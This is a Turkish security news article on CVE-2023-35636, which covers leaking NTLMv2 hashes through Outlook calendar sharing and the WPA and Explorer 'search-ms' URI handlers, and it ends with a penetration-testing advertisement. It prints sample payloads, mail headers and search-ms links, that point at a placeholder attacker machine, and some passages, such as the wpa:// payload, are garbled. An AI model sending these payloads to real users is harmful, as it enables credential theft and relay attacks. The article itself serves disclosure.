Outlook, Windows Performans Analiz Aracı (WPA) ve Windows Dosya Gezgini’nden yararlanarak NTLMv2 karmalarını ayıklamak için kullanılabilecek yeni bir Outlook güvenlik açığı belirlendi.
Bu güvenlik açığına CVE-2023-35636 atanmış ve önem derecesi 6,5 (Orta) olarak verilmiştir.
Bu güvenlik açığı Temmuz 2023’te Microsoft’a bildirildi ve Microsoft, WPA ve Dosya Gezgini’ne “Orta Düzeyde” yama uygulayarak harekete geçti.
Microsoft, bu güvenlik açığını Aralık 2023’te tamamen yamaladı. Ancak yama yapılmamış sistemler, karma parolaların kullanılmasına ve çalınmasına karşı hâlâ savunmasızdır.
Bu güvenlik açığı, Outlook’un takvim paylaşım işlevinin kötüye kullanılmasıdır ve iki ek başlık eklenirse Outlook’un harici bir makineye bağlanıp içerik paylaşmasına neden olabilir. Bu bağlantı ayrıca NTLMv2 karmasını yakalamak için de kullanılabilir.
Bir saldırganın NTLM v3 karmalarını çıkarmada başarılı olduğunu varsayalım. Bu durumda iki olası saldırı yöntemi vardır; orijinal parolayı ortaya çıkarabilen Çevrimdışı kaba kuvvet saldırıları ve bir sunucuya yapılan kimlik doğrulama isteğinin saldırgan tarafından NTLMv2 karma değeriyle değiştirilebildiği kimlik doğrulama aktarma saldırıları. ve sunucuda kurbanın adı altında kimlik doğrulaması yapın.
Outlook kullanılarak NTLM v2 karmalarının sızdırılması
Outlook, dünya çapında milyonlarca kişi ve kuruluş tarafından kullanılan Microsoft 365 paketi için e-posta ve takvim aracı olarak hizmet vermektedir.
Başlıca özelliklerinden biri, kullanıcılar arasında takvimlerin paylaşılmasıdır; bu, karma parolanın saldırganın sunucusuna yeniden yönlendirilmesiyle sonuçlanabilecek bir kimlik doğrulama girişimini tetiklemek için kullanılabilir.
Kullanım için kullanılabilecek başlıklar şunlardır:
- “Content-Class” = “Paylaşım” — Outlook’a bu e-postanın paylaşım içeriği içerdiğini bildirir.
- “x-sharing-config-url” = \\(Saldırgan makinesi)\a.ics – kurbanın Outlook’unu saldırganın makinesine yönlendirir.
URI İşleyicilerini kullanarak NTLM v2 Karmalarını Sızdırmak
Windows’un varsayılan özelliği olan Windows Performans Analizcisi (WPA), varsayılan olarak WPA:// için bir URI işleyicisi yüklemek üzere bir eylem gerçekleştirir; bu, kullanıcı WPA ile ilgili bir bağlantıya tıkladığında programın otomatik olarak başlatılmasını sağlar.
Ayrıca bu özellik, açık web üzerinden kimlik doğrulama için NTLM v2 karmalarını kullanır. Bu, onu aktarma ve çevrimdışı kaba kuvvet saldırılarına karşı savunmasız hale getirir.
Tehdit aktörü bu WPA’dan yararlanmak için üç bölümden oluşan bir veri gönderebilir.
Tam yük:
wpa:////
wpa:// — işletim sistemine bu bağlantının WPA’da açılması gerektiğini söyler.
//
/bla — kurbanın makinesine hangi dosyaya erişeceğini söyler.
Windows Dosya Gezgini’ni kullanarak NTLM v2 Karmalarını Sızdırmak
Explorer.exe’nin arama özelliğini etkinleştiren ve explorer.exe işlemini web’e yönlendiren bir “search-ms” URI tanıtıcısı vardır. Bu explorer.exe, dosyalara ve klasörlere göz atmak, dosyaları kopyalamak ve taşımak ve klasörler oluşturmak ve silmek için çeşitli özelliklere sahip olan Windows İşletim sistemindeki en güçlü işlemlerden biridir.
Ancak, istismarın bir parçası olarak Microsoft’un belgelerinin bir parçası olarak tanımlanan iki parametre vardı: “alt sorgu” ve “kırıntı”. “Alt sorgu” parametresi ile kullanım için aşağıdaki payload kullanılabilir.
- search-ms://query=poc&subquery=\\(Saldırgan makine)\poc.search-ms
- search-ms:// – işletim sistemine bu bağlantının exe’de açılması gerektiğini söyler.
- query=poc – Sahte arama sorgusu
- &subquery=\\(Saldırgan makine)\poc.search-ms — .search-ms dosyasının yolu.
“crumb” parametresi ile kullanım için aşağıdaki payload kullanılabilir,
search-ms://query=poc&crumb=location:\\(Saldırgan makine)
- search-ms:// – işletim sistemine bu bağlantının exe’de açılması gerektiğini söyler.
- query=poc – Sahte arama sorgusu
- kırıntı=konum:\\(Saldırgan makine) — Kırıntı parametresinin altındaki konum özelliği, kullanıcının arama için bir yol belirlemesine olanak tanır.
Ayrıca saldırı senaryoları, yararlanma yöntemleri vb. hakkında ayrıntılı bilgi sağlayan eksiksiz bir rapor yayınlandı.
Dijital sistem güvenliğini değerlendirmek için Kelltron’un uygun maliyetli sızma testi hizmetlerini deneyin. Ücretsiz demo mevcut.